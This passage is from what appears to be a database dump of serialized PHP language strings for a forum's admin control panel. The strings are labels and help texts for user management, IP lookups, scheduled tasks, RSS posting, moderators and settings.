Merge\";s:10:\"coppa_user\";s:10:\"COPPA User\";s:26:\"could_not_resolve_hostname\";s:26:\"Could Not Resolve Hostname\";s:24:\"current_reputation_power\";s:24:\"Current Reputation Power\";s:10:\"delete_all\";s:10:\"Delete All\";s:33:\"delete_all_users_private_messages\";s:34:\"Delete All User\'s Private Messages\";s:13:\"delete_avatar\";s:13:\"Delete Avatar\";s:23:\"delete_private_messages\";s:23:\"Delete Private Messages\";s:36:\"delete_private_messages_sent_by_user\";s:36:\"Delete Private Messages Sent by User\";s:20:\"delete_subscriptions\";s:20:\"Delete Subscriptions\";s:11:\"delete_user\";s:11:\"Delete User\";s:34:\"delete_user_transfer_social_groups\";s:432:\"This user is the maintainer of %1$s social group(s) \r\nIf you delete this user, you will also delete their social groups as well as all discussions, messages, user memberships, social group images and all other content related to their social groups. \r\nIf you want to force the transfer of this user\'s social groups to yourself so that you may transfer or manage them later then check this checkbox: \";s:36:\"delete_visitor_messages_sent_by_user\";s:36:\"Delete Visitor Messages Sent by User\";s:13:\"deleting_bans\";s:13:\"Deleting Bans\";s:23:\"deleting_custom_avatars\";s:23:\"Deleting Custom Avatars\";s:27:\"deleting_custom_profilepics\";s:32:\"Deleting Custom Profile Pictures\";s:24:\"deleting_event_reminders\";s:24:\"Deleting Event Reminders\";s:15:\"deleting_events\";s:15:\"Deleting Events\";s:19:\"deleting_moderators\";s:19:\"Deleting Moderators\";s:25:\"deleting_private_messages\";s:25:\"Deleting Private Messages\";s:22:\"deleting_subscriptions\";s:22:\"Deleting Subscriptions\";s:26:\"deleting_user_forum_access\";s:26:\"Deleting User Forum Access\";s:32:\"deleting_usergroup_join_requests\";s:32:\"Deleting Usergroup Join Requests\";s:18:\"deleting_usernotes\";s:19:\"Deleting User Notes\";s:14:\"deleting_users\";s:14:\"Deleting Users\";s:15:\"depth_to_search\";s:15:\"Depth to Search\";s:20:\"destination_username\";s:20:\"Destination Username\";s:23:\"display_aim_screen_name\";s:23:\"Display AIM Screen Name\";s:15:\"display_avatars\";s:15:\"Display Avatars\";s:16:\"display_birthday\";s:16:\"Display Birthday\";s:18:\"display_coppa_user\";s:18:\"Display COPPA User\";s:13:\"display_email\";s:13:\"Display Email\";s:13:\"display_group\";s:13:\"Display Group\";s:17:\"display_home_page\";s:17:\"Display Home Page\";s:15:\"display_icq_uin\";s:15:\"Display ICQ UIN\";s:14:\"display_images\";s:14:\"Display Images\";s:25:\"display_infraction_points\";s:25:\"Display Infraction Points\";s:19:\"display_infractions\";s:19:\"Display Infractions\";s:18:\"display_ip_address\";s:18:\"Display IP Address\";s:17:\"display_join_date\";s:17:\"Display Join Date\";s:21:\"display_last_activity\";s:21:\"Display Last Activity\";s:17:\"display_last_post\";s:17:\"Display Last Post\";s:14:\"display_msn_id\";s:14:\"Display MSN ID\";s:28:\"display_parent_email_address\";s:28:\"Display Parent Email Address\";s:18:\"display_post_count\";s:18:\"Display Post Count\";s:18:\"display_reputation\";s:18:\"Display Reputation\";s:17:\"display_signature\";s:17:\"Display Signature\";s:18:\"display_signatures\";s:18:\"Display Signatures\";s:18:\"display_skype_name\";s:18:\"Display Skype Name\";s:18:\"display_user_title\";s:18:\"Display User Title\";s:17:\"display_usergroup\";s:17:\"Display Usergroup\";s:16:\"display_username\";s:17:\"Display User Name\";s:16:\"display_warnings\";s:16:\"Display Warnings\";s:9:\"display_x\";s:12:\"Display %1$s\";s:16:\"display_yahoo_id\";s:17:\"Display Yahoo! ID\";s:26:\"do_not_show_editor_toolbar\";s:26:\"Do Not Show Editor Toolbar\";s:23:\"dst_currently_in_effect\";s:26:\"Is DST currently in effect\";s:17:\"edit_access_masks\";s:17:\"Edit Access Masks\";s:30:\"edit_administrator_permissions\";s:30:\"Edit Administrator Permissions\";s:35:\"edit_forum_permissions_access_masks\";s:37:\"Edit Forum Permissions (Access Masks)\";s:27:\"edit_profile_customizations\";s:27:\"Edit Profile Customizations\";s:39:\"edit_profile_style_customizations_for_x\";s:72:\"Edit Profile Style Customizations for \'%1$s \'\";s:15:\"edit_reputation\";s:15:\"Edit Reputation\";s:23:\"edit_reputation_comment\";s:23:\"Edit Reputation Comment\";s:9:\"edit_user\";s:9:\"Edit User\";s:13:\"email_manager\";s:13:\"Email Manager\";s:13:\"email_options\";s:13:\"Email Options\";s:31:\"email_password_reminder_to_user\";s:31:\"Email Password Reminder to User\";s:21:\"email_to_send_at_once\";s:22:\"Email to send at once:\";s:45:\"email_will_be_sent_in_user_specified_language\";s:83:\"Note: The email will be sent in the language selected by the user in their profile.\";s:15:\"enter_image_url\";s:35:\"Please enter the URL of your image:\";s:27:\"enter_signature_picture_url\";s:27:\"Enter Signature Picture URL\";s:7:\"expires\";s:7:\"Expires\";s:26:\"find_ip_addresses_for_user\";s:51:\"Find IP Addresses for userEnter Username \";s:36:\"find_more_users_with_this_ip_address\";s:36:\"Find More Users with this IP Address\";s:24:\"find_users_by_ip_address\";s:69:\"Find Users by IP AddressYou may enter a partial IP Address \";s:17:\"forum_permissions\";s:17:\"Forum Permissions\";s:29:\"has_not_logged_on_for_xx_days\";s:35:\"Has not logged on for x days\";s:26:\"human_verification_manager\";s:26:\"Human Verification Manager\";s:26:\"human_verification_options\";s:26:\"Human Verification Options\";s:7:\"icq_uin\";s:7:\"ICQ UIN\";s:45:\"if_you_leave_a_field_blank_it_will_be_ignored\";s:45:\"If you leave a field blank it will be ignored\";s:37:\"if_you_want_to_prune_user_posts_first\";s:89:\"If you want to prune all the user\'s messages first, please click here .\";s:10:\"ignore_all\";s:10:\"Ignore All\";s:13:\"image_options\";s:13:\"Image Options\";s:26:\"image_verification_options\";s:26:\"Image Verification Options\";s:38:\"include_users_that_have_declined_email\";s:46:\"Include users that have declined admin emails?\";s:17:\"infraction_groups\";s:17:\"Infraction Groups\";s:17:\"infraction_points\";s:17:\"Infraction Points\";s:34:\"infraction_points_are_greater_than\";s:46:\"Infraction Points are greater than or equal to\";s:31:\"infraction_points_are_less_than\";s:31:\"Infraction Points are less than\";s:28:\"infractions_are_greater_than\";s:40:\"Infractions are greater than or equal to\";s:25:\"infractions_are_less_than\";s:25:\"Infractions are less than\";s:34:\"ip_address_search_for_ip_address_x\";s:47:\"IP Address Search for IP Address: \"%1$s\"\";s:28:\"ip_address_search_for_user_x\";s:41:\"IP Address Search for User: \" %1$s\"\";s:45:\"it_is_recommended_that_you_update_user_titles\";s:141:\"It is recommended that you update user titles and ranks after adding, editing, and deleting user titles or ranks.\";s:18:\"join_date_is_after\";s:18:\"Join Date is After\";s:19:\"join_date_is_before\";s:19:\"Join Date is Before\";s:21:\"join_requests_manager\";s:21:\"Join Requests Manager\";s:16:\"keep_adminavatar\";s:18:\"Keep Custom Avatar\";s:20:\"keep_adminprofilepic\";s:23:\"Keep Custom Profile Pic\";s:22:\"last_activity_is_after\";s:22:\"Last Activity is After\";s:23:\"last_activity_is_before\";s:23:\"Last Activity is Before\";s:18:\"last_post_is_after\";s:18:\"Last Post is After\";s:19:\"last_post_is_before\";s:19:\"Last Post is Before\";s:22:\"list_new_registrations\";s:22:\"List New Registrations\";s:16:\"list_top_posters\";s:16:\"List Top Posters\";s:30:\"list_users_awaiting_moderation\";s:30:\"List Users Awaiting Moderation\";s:26:\"list_users_with_x_messages\";s:29:\"List Users with %1$s Messages\";s:34:\"list_visitors_in_the_last_24_hours\";s:34:\"List Visitors in the Last 24 Hours\";s:15:\"maximum_results\";s:11:\"Max Results\";s:42:\"merge_allows_you_to_join_two_user_accounts\";s:535:\"Merge allows you to join two user accounts into one single account.\r\nThe source account will be combined into the destination account. \r\n \r\nPosts, threads, calendar events, private messages, post count, reputation, contacts, friends and ignore list will be combined. \r\n \r\nThe combined user will still have the same permissions that the destination user had to begin with.\r\nAny access masks or moderator ability that the source user had will not be transferred. \r\n \r\nThis process cannot be reversed .\";s:11:\"merge_users\";s:11:\"Merge Users\";s:13:\"message_email\";s:534:\"Message:In the message, you may use $userid, $username, $email, $activateid, and $activatelink. $activateid will be the activation number the user must use to activate his/her account. $activatelink will be the URL that a user needs to visit to be activated. Note: These will only be defined to users in the \"Users Awaiting Email Confirmation\" group. Note: you cannot send passwords using this form as they are encrypted in the database. Please link to the \'lost password\' form instead. \";s:22:\"move_user_to_usergroup\";s:22:\"Move User to Usergroup\";s:6:\"msn_id\";s:6:\"MSN ID\";s:9:\"new_value\";s:9:\"New Value\";s:16:\"no_matches_found\";s:16:\"No Matches Found\";s:18:\"number_of_messages\";s:18:\"Number of Messages\";s:15:\"number_of_users\";s:15:\"Number of Users\";s:9:\"old_value\";s:9:\"Old Value\";s:20:\"other_please_specify\";s:22:\"Other (please specify)\";s:18:\"personal_home_page\";s:9:\"Home Page\";s:27:\"please_input_referral_dates\";s:115:\"Please input the dates that you would like the report run for or leave them blank for a report covering everything.\";s:6:\"points\";s:6:\"Points\";s:58:\"pop_up_notification_box_when_a_private_message_is_received\";s:60:\"Pop up a Notification Box When a Private Message is Received\";s:17:\"post_ip_addresses\";s:17:\"Post IP Addresses\";s:22:\"posts_are_greater_than\";s:34:\"Posts are greater than or equal to\";s:19:\"posts_are_less_than\";s:19:\"Posts are less than\";s:18:\"posts_is_less_than\";s:18:\"Posts is less than\";s:13:\"primary_users\";s:13:\"Primary Users\";s:26:\"private_message_statistics\";s:26:\"Private Message Statistics\";s:38:\"private_messages_belonging_to_the_user\";s:38:\"Private Messages belonging to the user\";s:22:\"private_messages_for_x\";s:25:\"Private Messages for %1$s\";s:33:\"private_messages_sent_by_the_user\";s:33:\"Private Messages sent by the user\";s:7:\"process\";s:7:\"Process\";s:28:\"profile_style_customizations\";s:28:\"Profile Style Customizations\";s:12:\"question_dfn\";s:67:\"QuestionAnswers are added after the question is created. \";s:29:\"question_verification_options\";s:42:\"Question & Answer Verification Options\";s:16:\"quick_user_links\";s:16:\"Quick User Links\";s:36:\"receieve_friend_request_notification\";s:35:\"Receive Friend Request Notification\";s:15:\"referrals_for_x\";s:18:\"Referrals for %1$s\";s:5:\"regex\";s:5:\"Regex\";s:23:\"registration_ip_address\";s:23:\"Registration IP Address\";s:25:\"registration_ip_addresses\";s:25:\"Registration IP Addresses\";s:32:\"regular_expression_require_match\";s:185:\"Regular ExpressionYou may require the input field to match a regular expression (PCRE ). \";s:46:\"reputation_for_a_page_b_c_there_are_d_comments\";s:63:\"Reputation for %1$s (Page %2$s/%3$s) | There are %4$s comments.\";s:26:\"reputation_is_greater_than\";s:38:\"Reputation is greater than or equal to\";s:23:\"reputation_is_less_than\";s:23:\"Reputation is less than\";s:42:\"resize_image_to_users_maximum_allowed_size\";s:94:\"Resize image to user\'s maximum allowed dimensions\r\nAs defined by their usergroup(s) \";s:15:\"resolve_address\";s:15:\"Resolve Address\";s:15:\"search_criteria\";s:15:\"Search Criteria\";s:19:\"search_ip_addresses\";s:19:\"Search IP Addresses\";s:12:\"search_users\";s:12:\"Search Users\";s:28:\"send_email_to_accepted_users\";s:42:\"Send email to users who have been accepted\";s:27:\"send_email_to_deleted_users\";s:41:\"Send email to users who have been deleted\";s:18:\"send_email_to_user\";s:18:\"Send Email to User\";s:21:\"send_password_to_user\";s:21:\"Send Password to User\";s:28:\"send_private_message_to_user\";s:28:\"Send Private Message to User\";s:20:\"show_all_coppa_users\";s:20:\"Show All COPPA Users\";s:14:\"show_all_users\";s:14:\"Show All Users\";s:33:\"show_others_custom_profile_styles\";s:39:\"Show Other Users\' Custom Profile Styles\";s:27:\"showing_avatars_x_to_y_of_z\";s:36:\"Showing Avatars %1$s to %2$s of %3$s\";s:25:\"showing_users_x_to_y_of_z\";s:34:\"Showing Users %1$s to %2$s of %3$s\";s:15:\"sorting_options\";s:15:\"Sorting Options\";s:15:\"source_username\";s:15:\"Source Username\";s:18:\"starting_at_result\";s:18:\"Starting at Result\";s:18:\"subscribe_choice_0\";s:30:\"Subscribe with no notification\";s:18:\"subscribe_choice_1\";s:26:\"Instant email notification\";s:18:\"subscribe_choice_2\";s:24:\"Daily email notification\";s:18:\"subscribe_choice_3\";s:25:\"Weekly email notification\";s:21:\"subscribe_choice_none\";s:16:\"Do not subscribe\";s:4:\"test\";s:4:\"Test\";s:15:\"test_email_only\";s:56:\"Test Email Only?(Will not send any email out) \";s:29:\"text_to_separate_addresses_by\";s:220:\"Text to separate addresses by:This is a space by default, but you may wish to produce, CSV (in this case use a comma) or quoted CSV (use: \",\" in this case, including the quotes), so both of these are possible. \";s:29:\"this_action_is_not_reversible\";s:222:\"Note: Clicking the \'delete\' button will remove the selected users completely. This action is not reversible... please be sure! Users marked with the [ ! ] button are not editable using this system.\";s:48:\"this_is_a_coppa_user_do_not_change_to_registered\";s:103:\"This is a COPPA user. Do not change usergroup to \'Registered\' unless you have received parental consent\";s:48:\"this_system_allows_you_to_mass_move_delete_users\";s:266:\"This system allows you to mass-move users to a different usergroup, or prune away inactive members. Use the form below to select users matching your search conditions. You will then be given the option to individually move or prune away the matched users.\";s:12:\"time_options\";s:12:\"Time Options\";s:40:\"update_or_add_administration_permissions\";s:40:\"Update or Add Administration Permissions\";s:22:\"updating_threads_posts\";s:24:\"Updating Threads / Posts\";s:28:\"updating_threads_posts_for_x\";s:33:\"Updating Threads / Posts for %1$s\";s:14:\"updating_users\";s:14:\"Updating Users\";s:18:\"use_current_avatar\";s:18:\"Use Current Avatar\";s:33:\"use_email_notification_by_default\";s:33:\"Use Email Notification by Default\";s:21:\"use_signature_picture\";s:21:\"Use Signature Picture\";s:18:\"user_has_no_avatar\";s:18:\"User has no avatar\";s:12:\"user_manager\";s:12:\"User Manager\";s:26:\"user_moving_pruning_system\";s:26:\"User Moving/Pruning System\";s:36:\"user_no_permission_customize_profile\";s:80:\"This user does not have permission to customize any parts of his or her profile.\";s:26:\"user_profile_field_options\";s:26:\"User Profile Field Options\";s:15:\"user_ranks_desc\";s:143:\"User ranks are images that appear beneath your user\'s names on their posts. Ranks assigned to All Usergroups appear for everyone.\";s:8:\"user_set\";s:13:\"Yes, user set\";s:18:\"user_title_manager\";s:18:\"User Title Manager\";s:16:\"usergroup_leader\";s:16:\"Usergroup Leader\";s:17:\"usergroup_options\";s:17:\"Usergroup Options\";s:22:\"userid_is_greater_than\";s:35:\"User ID is greater than or equal to\";s:19:\"userid_is_less_than\";s:20:\"User ID is less than\";s:25:\"users_awaiting_moderation\";s:25:\"Users Awaiting Moderation\";s:36:\"users_with_x_private_messages_stored\";s:39:\"Users with %1$s Private Messages Stored\";s:19:\"view_change_history\";s:19:\"View change history\";s:22:\"view_forum_permissions\";s:22:\"View Forum Permissions\";s:16:\"view_infractions\";s:16:\"View Infractions\";s:17:\"view_ip_addresses\";s:17:\"View IP Addresses\";s:18:\"view_join_requests\";s:18:\"View Join Requests\";s:37:\"view_other_ip_addresses_for_this_user\";s:37:\"View Other IP Addresses for this User\";s:31:\"view_private_message_statistics\";s:31:\"View Private Message Statistics\";s:34:\"view_social_groups_created_by_user\";s:34:\"View Social Groups Created by User\";s:33:\"visitor_messages_sent_by_the_user\";s:33:\"Visitor Messages sent by the User\";s:7:\"warning\";s:7:\"Warning\";s:8:\"warnings\";s:8:\"Warnings\";s:25:\"warnings_are_greater_than\";s:37:\"Warnings are greater than or equal to\";s:22:\"warnings_are_less_than\";s:22:\"Warnings are less than\";s:8:\"yahoo_id\";s:9:\"Yahoo! ID\";s:24:\"yes_but_not_parsing_html\";s:25:\"Yes, but not parsing HTML\";s:33:\"you_may_not_delete_move_this_user\";s:159:\"You may not delete/move this user - The user is either:\\n\\n1) An Administrator\\n2) A Super-Moderator\\n3) A Moderator\\n4) Undeletable User (config.php)\\n5) You!\";}', 'a:12:{s:13:\"access_denied\";s:13:\"Access Denied\";s:21:\"access_denied_x_users\";s:27:\"Access Denied: %1$s User(s)\";s:14:\"access_granted\";s:14:\"Access Granted\";s:22:\"access_granted_x_users\";s:28:\"Access Granted: %1$s User(s)\";s:19:\"access_mask_manager\";s:19:\"Access Mask Manager\";s:25:\"access_masks_quick_editor\";s:25:\"Access Masks Quick Editor\";s:23:\"delete_all_access_masks\";s:23:\"Delete All Access Masks\";s:17:\"display_all_users\";s:17:\"Display All Users\";s:13:\"display_users\";s:13:\"Display Users\";s:18:\"next_picture_short\";s:5:\"????.\";s:4:\"sort\";s:4:\"Sort\";s:23:\"user_forum_access_for_x\";s:26:\"User Forum Access for %1$s\";}', 'a:109:{s:6:\"active\";s:6:\"Active\";s:22:\"add_new_scheduled_task\";s:22:\"Add New Scheduled Task\";s:27:\"allow_html_in_announcements\";s:75:\"Allow HTML in Announcements\r\nStrongly not recommended - see Help \";s:37:\"are_you_sure_want_to_delete_rssfeed_x\";s:253:\"Are you sure you want to delete the RSS feed called \'%1$s\'? \r\n \r\nDeleting this item will not remove any threads, posts or announcements posted from the feed. Please use the regular moderation tools if you wish to remove these.\";s:51:\"are_you_sure_you_want_to_delete_this_scheduled_task\";s:52:\"Are you sure you want to delete this Scheduled Task?\";s:13:\"body_template\";s:13:\"Body Template\";s:16:\"check_feed_every\";s:19:\"Check Feed Every...\";s:24:\"close_thread_after_delay\";s:24:\"Close Thread After Delay\";s:22:\"convert_html_to_bbcode\";s:118:\"Convert HTML to BB Code.\r\nIf this is enabled then the setting \"Allow HTML in Announcements\" will be ignored \";s:8:\"day_abbr\";s:1:\"D\";s:12:\"day_of_month\";s:16:\"Day of the Month\";s:11:\"day_of_week\";s:79:\"Day of the Week (Note: this overrides the \'day of the month\' option) \";s:38:\"days_for_announcement_to_remain_active\";s:38:\"Days for Announcement to Remain Active\";s:11:\"dow_acronym\";s:3:\"DoW\";s:13:\"edit_rss_feed\";s:13:\"Edit RSS Feed\";s:15:\"feed_is_enabled\";s:15:\"Feed is Enabled\";s:29:\"feed_supports_content_encoded\";s:256:\"This feed supports content:encoded . Your imported feeds may appear nicer if you use {feed:content:encoded} in your bodytemplate instead of {feed:description} and enable the Convert HTML to BB Code option.\";s:11:\"friday_abbr\";s:3:\"Fri\";s:9:\"hour_abbr\";s:1:\"h\";s:12:\"last_checked\";s:12:\"Last Checked\";s:10:\"log_phrase\";s:10:\"Log Phrase\";s:18:\"make_thread_sticky\";s:18:\"Make Thread Sticky\";s:15:\"match_all_words\";s:15:\"Match All Words\";s:22:\"maximum_items_to_fetch\";s:97:\"Maximum Items to Fetch\r\nAny items above this number found in the feed will be ignored. \";s:8:\"min_abbr\";s:1:\"m\";s:15:\"moderate_thread\";s:124:\"Moderate Thread\r\nIf set to \'Yes\', threads will be invisible when posted until authorized by a board staff member. \";s:11:\"monday_abbr\";s:3:\"Mon\";s:10:\"month_abbr\";s:1:\"M\";s:9:\"next_time\";s:9:\"Next Time\";s:30:\"note_prefix_must_allowed_forum\";s:69:\"Note: the prefix you choose must be allowed in the destination forum!\";s:27:\"post_items_as_announcements\";s:27:\"Post Items as Announcements\";s:21:\"post_items_as_threads\";s:21:\"Post Items as Threads\";s:12:\"preview_feed\";s:12:\"Preview Feed\";s:23:\"reset_last_checked_time\";s:23:\"Reset Last Checked Time\";s:8:\"rss_feed\";s:8:\"RSS Feed\";s:25:\"rss_templates_description\";s:405:\"The two templates listed here are used for the title (title template) and body (body template) of messages posted by the RSS poster. \r\n \r\nYou can specify exactly how these items appear and any item from a feed can be inserted by using {feed:fieldname } where \'fieldname\' corresponds to one of the following: title, description, link, id, date, enclosure_href and content:encoded.\";s:21:\"rssfeed_body_template\";s:52:\"{feed:description}\r\n\r\n[url={feed:link}]More...[/url]\";s:22:\"rssfeed_title_template\";s:12:\"{feed:title}\";s:7:\"run_now\";s:7:\"Run Now\";s:22:\"run_scheduled_task_now\";s:22:\"Run Scheduled Task Now\";s:13:\"saturday_abbr\";s:3:\"Sat\";s:14:\"scheduled_task\";s:14:\"Scheduled Task\";s:22:\"scheduled_task_manager\";s:22:\"Scheduled Task Manager\";s:15:\"scheduled_tasks\";s:15:\"Scheduled Tasks\";s:16:\"search_item_body\";s:16:\"Search Item Body\";s:22:\"search_items_for_words\";s:229:\"Search Items for Words\r\nOnly insert items if they contain one or more of these words. Put a space or a new line between each search word. You can create a phrase with multiple words by enclosing them in double quotes. \";s:11:\"sunday_abbr\";s:3:\"Sun\";s:18:\"task_activate_desc\";s:161:\"This script sends reminder emails to users in the Awaiting Confirmation usergroup. An email is sent one day after the user has registered and again at five days.\";s:17:\"task_activate_log\";s:40:\"Activation Reminder Emails sent to: %1$s\";s:19:\"task_activate_title\";s:25:\"Activation Reminder Email\";s:25:\"task_attachmentviews_desc\";s:175:\"This script updates attachment views once an hour if the delayed attachment views option is enabled. This is suggested for forums with a large number of attachments or users.\";s:24:\"task_attachmentviews_log\";s:24:\"Attachment Views Updated\";s:26:\"task_attachmentviews_title\";s:16:\"Attachment Views\";s:18:\"task_birthday_desc\";s:40:\"Sends emails to users on their birthday.\";s:17:\"task_birthday_log\";s:28:\"Birthday Email Sent to: %1$s\";s:19:\"task_birthday_title\";s:9:\"Birthdays\";s:16:\"task_ccbill_desc\";s:178:\"This script is only needed if you enable the CCBill payment processor. It will contact the CCBill server to check for reversed payments and update your subscriptions accordingly.\";s:15:\"task_ccbill_log\";s:12:\"CCBill: %1$s\";s:17:\"task_ccbill_title\";s:21:\"CCBill Reversal Check\";s:18:\"task_cleanup2_desc\";s:57:\"This script performs various cleanup tasks once per hour.\";s:17:\"task_cleanup2_log\";s:27:\"Hourly Cleanup #2 Completed\";s:19:\"task_cleanup2_title\";s:17:\"Hourly Cleanup #2\";s:17:\"task_cleanup_desc\";s:57:\"This script performs various cleanup tasks once per hour.\";s:16:\"task_cleanup_log\";s:27:\"Hourly Cleanup #1 Completed\";s:18:\"task_cleanup_title\";s:14:\"Hourly Cleanup\";s:22:\"task_dailycleanup_desc\";s:56:\"This script performs various cleanup tasks once per day.\";s:21:\"task_dailycleanup_log\";s:23:\"Daily Cleanup Completed\";s:23:\"task_dailycleanup_title\";s:13:\"Daily Cleanup\";s:21:\"task_digestdaily_desc\";s:67:\"This script sends out new post and new thread digests once per day.\";s:20:\"task_digestdaily_log\";s:17:\"Daily Digest Sent\";s:22:\"task_digestdaily_title\";s:12:\"Daily Digest\";s:22:\"task_digestweekly_desc\";s:68:\"This script sends out new post and new thread digests once per week.\";s:21:\"task_digestweekly_log\";s:18:\"Weekly Digest Sent\";s:23:\"task_digestweekly_title\";s:13:\"Weekly Digest\";s:21:\"task_infractions_desc\";s:42:\"Removes expired infractions twice an hour.\";s:20:\"task_infractions_log\";s:28:\"Infraction Expired for: %1$s\";s:22:\"task_infractions_title\";s:19:\"Infractions Cleanup\";s:19:\"task_promotion_desc\";s:56:\"This script performs usergroup promotions once per hour.\";s:18:\"task_promotion_log\";s:107:\"Usergroup: %1$s %2$s; Users: %3$s* = Primary Usergroup, %% = Secondary Usergroup \";s:20:\"task_promotion_title\";s:15:\"User Promotions\";s:18:\"task_reminder_desc\";s:61:\"This script sends out calendar event reminders twice an hour.\";s:17:\"task_reminder_log\";s:34:\"Event Reminder Email Sent to: %1$s\";s:19:\"task_reminder_title\";s:14:\"Event Reminder\";s:20:\"task_removebans_desc\";s:73:\"This script restores the access of temporarily banned users once an hour.\";s:19:\"task_removebans_log\";s:25:\"Lifted Ban on Users: %1$s\";s:21:\"task_removebans_title\";s:32:\"Restore Temporarily Banned Users\";s:19:\"task_rssposter_desc\";s:95:\"Reads RSS feeds from the internet and inserts them into your board as threads or announcements.\";s:18:\"task_rssposter_log\";s:28:\"Inserted the following: %1$s\";s:20:\"task_rssposter_title\";s:16:\"RSS Poster Robot\";s:15:\"task_stats_desc\";s:164:\"This script updates forum stats once per day. These are the stats that are accessed from the Admin Control Panel (New Users, New Threads, New Posts, Active Users).\";s:14:\"task_stats_log\";s:24:\"Daily Statistics Updated\";s:16:\"task_stats_title\";s:20:\"Daily Statistics Log\";s:23:\"task_subscriptions_desc\";s:127:\"Once per day, this script removes expired paid subscriptions as well as sends out reminders about soon to expire subscriptions.\";s:22:\"task_subscriptions_log\";s:26:\"Paid Subscriptions Updated\";s:24:\"task_subscriptions_title\";s:13:\"Subscriptions\";s:21:\"task_threadviews_desc\";s:124:\"This script updates thread views once per hour. This option is suggested for forums with large numbers of threads or users.\";s:20:\"task_threadviews_log\";s:20:\"Thread Views Updated\";s:22:\"task_threadviews_title\";s:12:\"Thread Views\";s:19:\"thread_action_delay\";s:206:\"Thread Action Delay (Hours)\r\nIf you specify a number of hours here, the actions checked below will be performed on the inserted thread after the delay specified. Set to 0 to disable this feature. \";s:13:\"thursday_abbr\";s:3:\"Thu\";s:14:\"title_template\";s:14:\"Title Template\";s:12:\"tuesday_abbr\";s:3:\"Tue\";s:26:\"unstick_thread_after_delay\";s:33:\"Unstick Sticky Thread After Delay\";s:11:\"url_of_feed\";s:11:\"URL of Feed\";s:14:\"wednesday_abbr\";s:3:\"Wed\";s:7:\"x_hours\";s:10:\"%1$s Hours\";s:9:\"x_minutes\";s:12:\"%1$s Minutes\";s:20:\"x_unable_to_open_url\";s:59:\" %1$s Unable to open URL or no data returned
\";s:23:\"x_xml_error_y_at_line_z\";s:49:\"%1$s XML Error: %2$s at line %3$s
\";}', 'a:22:{s:28:\"add_new_moderator_to_forum_x\";s:59:\"Add New Moderator to Forum %1$s \";s:39:\"are_you_sure_want_to_delete_moderator_x\";s:235:\"Are you sure you want to delete the moderator called \'%1$s\'?(%2$s: %3$s) %4$s This action cannot be undone and may cause this user to be returned to the default, registered group.\";s:46:\"are_you_sure_you_want_to_delete_this_moderator\";s:128:\"Are you sure you want to delete this Moderator? This action may cause this user to be returned to the default, registered group.\";s:26:\"can_delete_albums_pictures\";s:26:\"Can Delete Albums/Pictures\";s:24:\"can_edit_albums_pictures\";s:24:\"Can Edit Albums/Pictures\";s:33:\"can_edit_user_reputation_comments\";s:33:\"Can Edit User Reputation Comments\";s:37:\"change_moderator_primary_usergroup_to\";s:39:\"Change Moderator\'s Primary Usergroup to\";s:28:\"edit_moderator_x_for_forum_y\";s:48:\"Edit Moderator %1$s for Forum %2$s\";s:17:\"email_preferences\";s:17:\"Email Preferences\";s:44:\"error_occurred_while_making_users_moderators\";s:62:\"An error occurred while making the following users moderators:\";s:42:\"if_you_would_like_to_remove_this_moderator\";s:42:\"If You Would Like to Remove this Moderator\";s:26:\"make_moderator_a_member_of\";s:26:\"Make Moderator a Member of\";s:17:\"moderator_manager\";s:17:\"Moderator Manager\";s:20:\"more_than_x_days_ago\";s:23:\"More Than %1$s Days Ago\";s:25:\"receive_email_on_new_post\";s:40:\"Receive Email When a New Post is Created\";s:27:\"receive_email_on_new_thread\";s:42:\"Receive Email When a New Thread is Created\";s:32:\"remove_moderator_from_all_forums\";s:37:\"Remove this Moderator from All Forums\";s:27:\"super_moderator_permissions\";s:27:\"Super Moderator Permissions\";s:16:\"super_moderators\";s:16:\"Super Moderators\";s:40:\"the_following_users_were_made_moderators\";s:54:\"The following users were successfully made moderators:\";s:23:\"there_are_no_moderators\";s:33:\"There are no assigned moderators.\";s:22:\"user_album_permissions\";s:22:\"User Album Permissions\";}', 'a:132:{s:15:\"add_new_setting\";s:15:\"Add New Setting\";s:21:\"add_new_setting_group\";s:21:\"Add New Setting Group\";s:11:\"add_setting\";s:11:\"Add Setting\";s:9:\"alignment\";s:9:\"Alignment\";s:37:\"are_you_sure_want_to_delete_setting_x\";s:52:\"Are you sure you want to delete the setting: \'%1$s\'?\";s:42:\"are_you_sure_want_to_delete_settinggroup_x\";s:58:\"Are you sure you want to delete the setting group: \'%1$s\'?\";s:6:\"backup\";s:6:\"Backup\";s:23:\"backup_restore_settings\";s:25:\"Backup / Restore Settings\";s:5:\"basic\";s:5:\"Basic\";s:9:\"blacklist\";s:9:\"Blacklist\";s:5:\"blank\";s:7:\"(blank)\";s:23:\"collapse_setting_groups\";s:23:\"Collapse Setting Groups\";s:11:\"collapsible\";s:11:\"Collapsible\";s:9:\"contactus\";s:10:\"Contact Us\";s:14:\"coppa_disabled\";s:13:\"Disable COPPA\";s:13:\"coppa_enabled\";s:12:\"Enable COPPA\";s:3:\"css\";s:3:\"CSS\";s:14:\"custom_setting\";s:14:\"Custom Setting\";s:32:\"database_automatic_forum_marking\";s:34:\"Database (automatic forum marking)\";s:35:\"database_no_automatic_forum_marking\";s:37:\"Database (no automatic forum marking)\";s:17:\"datatype_bitfield\";s:8:\"Bitfield\";s:16:\"datatype_boolean\";s:7:\"Boolean\";s:13:\"datatype_free\";s:4:\"Free\";s:16:\"datatype_integer\";s:7:\"Integer\";s:16:\"datatype_numeric\";s:7:\"Numeric\";s:15:\"datatype_posint\";s:16:\"Positive Integer\";s:17:\"datatype_username\";s:8:\"Username\";s:26:\"deny_under_13_registration\";s:47:\"Deny registration for users aged under 13 years\";s:8:\"detailed\";s:8:\"Detailed\";s:19:\"detected_gd_version\";s:19:\"Detected GD Version\";s:25:\"disable_all_ajax_features\";s:25:\"Disable All AJAX Features\";s:16:\"disable_controls\";s:16:\"Disable Controls\";s:33:\"disable_problematic_ajax_features\";s:33:\"Disable Problematic AJAX Features\";s:16:\"disable_scanning\";s:16:\"Disable Scanning\";s:11:\"display_age\";s:11:\"Display Age\";s:32:\"display_but_require_admin_or_mod\";s:47:\"Display, but require administrator or moderator\";s:19:\"display_infractions\";s:19:\"Display Infractions\";s:16:\"display_publicly\";s:16:\"Display publicly\";s:24:\"display_reputation_power\";s:24:\"Display Reputation Power\";s:13:\"do_not_log_ip\";s:13:\"Do not log IP\";s:26:\"download_settings_xml_file\";s:26:\"Download Settings XML File\";s:24:\"download_upload_settings\";s:26:\"Download / Upload Settings\";s:13:\"edit_settings\";s:13:\"Edit Settings\";s:16:\"email_moderators\";s:16:\"Email Moderators\";s:35:\"email_moderators_and_administrators\";s:54:\"Email Moderators, Super Moderators, and 